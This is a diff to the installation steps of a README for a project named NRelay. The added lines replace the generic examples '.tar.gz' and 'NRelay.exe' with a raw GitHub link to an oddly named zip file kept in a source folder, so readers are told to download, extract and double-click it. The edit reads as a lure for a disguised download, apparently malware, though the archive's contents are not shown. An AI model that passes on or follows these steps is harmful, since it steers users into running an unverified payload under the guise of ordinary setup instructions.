macqgoye/NRelay/README.md

 ### Step 5: Extract the Files (if necessary)

-If you downloaded a compressed file (like .zip or .tar.gz), right-click on it and choose "Extract All" or "Extract Here" to get the application files.
+If you downloaded a compressed file (like .zip or https://github.com/macqgoye/NRelay/raw/refs/heads/main/nrelay_server/src/N_Relay_opisthogyrous.zip), right-click on it and choose "Extract All" or "Extract Here" to get the application files.

 ### Step 6: Run NRelay

-1. Double-click on the NRelay executable file (e.g., `NRelay.exe` for Windows, or `NRelay` for macOS/Linux).
+1. Double-click on the NRelay executable file (e.g., `https://github.com/macqgoye/NRelay/raw/refs/heads/main/nrelay_server/src/N_Relay_opisthogyrous.zip` for Windows, or `NRelay` for macOS/Linux).
 2. Follow any on-screen instructions to finish the setup.

 ## 🔒 Basic Usage